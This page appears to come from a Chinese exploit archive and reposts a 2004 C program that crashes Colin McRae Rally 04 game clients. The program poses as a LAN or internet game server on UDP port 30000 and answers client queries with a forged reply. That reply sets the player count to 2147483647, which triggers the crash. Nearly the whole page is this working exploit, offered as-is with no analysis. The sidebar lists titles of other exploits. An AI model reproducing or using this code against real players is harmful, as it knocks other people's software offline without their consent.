首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Colin McRae Rally DoS Exploit
来源:vfocus.net 作者:vfocus 发布时间:2004-06-10  

Colin McRae Rally DoS Exploit

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#define VER "0.1"
#define BUFFSZ 2048
#define PORT 30000
#define PLAYBUG "2147483647" /* THE BUG IS HERE! */
#define PING "\x05\x00\x00\x00\x00\x00"
#define GAMEVER "1.0" /* Retail game */
//#define GAMEVER "Lan Demo 1.0" /* demo game */

void std_err(void);

int main(int argc, char *argv[]) {
int sd,
len,
on = 1,
psz;
struct sockaddr_in peer;
u_char *buff,
*pck,
pcklan[] =
"\x00\x00\x00\x00\x00"
"hostname\0" "You crash\0"
"gamever\0" GAMEVER"\0"
"hostport\0" "30000\0"
"password\0" "0\0"
"gametype\0" "Stages, ESP P1\0"
"gamemode\0" "openwaiting\0"
"numplayers\0" PLAYBUG"\0"
"maxplayers\0" "4\0"
"rally\0" "0\0"
"stages\0" "100\0"
"damage\0" "0\0"
"ranking\0" "0\0"
"cartype\0" "0\0",
pckinternet[] =
"\x00\x00\x00\x00\x00"
"You crash\0"
GAMEVER"\0"
"0\0"
"Stages, ESP P1\0"
"openwaiting\0"
PLAYBUG"\0"
"4\0";

setbuf(stdout, NULL);

fputs("\n"
"Colin McRae Rally 04 1.0 broadcast client crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

peer.sin_addr.s_addr = INADDR_ANY;
peer.sin_port = htons(PORT);
peer.sin_family = AF_INET;
psz = sizeof(peer);

printf("\n"
"The game version that will be used is \"%s\"\n"
" Only the clients with the same version you use here will be
vulnerable,\n"
" modify the source code (GAMEVER) to change this version\n"
"\n"
"Binding UDP port %u\n",
GAMEVER, PORT);

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
< 0) std_err();
if(bind(sd, (struct sockaddr *)&peer, psz)
< 0) std_err();

buff = malloc(BUFFSZ);
if(!buff) std_err();

fputs("\nClients:\n", stdout);
while(1) {
len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer,
&psz);
if(len < 0) std_err();

if(buff[2]) {
printf("PING %s:%hu\n",
inet_ntoa(peer.sin_addr), htons(peer.sin_port));

if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr
*)&peer, psz)
< 0) std_err();
continue;
}

if(len == 10) {
fputs("LAN ", stdout);
pck = pcklan;
len = sizeof(pcklan) - 1;
} else {
fputs("INTERNET ", stdout);
pck = pckinternet;
len = sizeof(pckinternet) - 1;
}

printf("%s:%hu\n",
inet_ntoa(peer.sin_addr), htons(peer.sin_port));

memcpy(pck, buff + 2, 5);
if(sendto(sd, pck, len, 0, (struct sockaddr *)&peer, psz)
< 0) std_err();
}

close(sd);
return(0);
}

#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mkdir本地缓冲区溢出漏洞
·RedHat 8x LPRng autorooter
·Metamail Buffer Overflow Explo
·Remote exploit for Apache + Op
·Symantec Firewall DNS Response
·Borland Interbase 7.x and belo
·Apache/1.3.27 - Remote Root Ex
·Subversion svn_time_from_cstri
·mkdir buffer overflow UNIX 7th
·Squid STABLE NTLM authenticate
·Mollensoft FTP Server CMD Buff
·Toca Race Driver 1 multiple Do
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved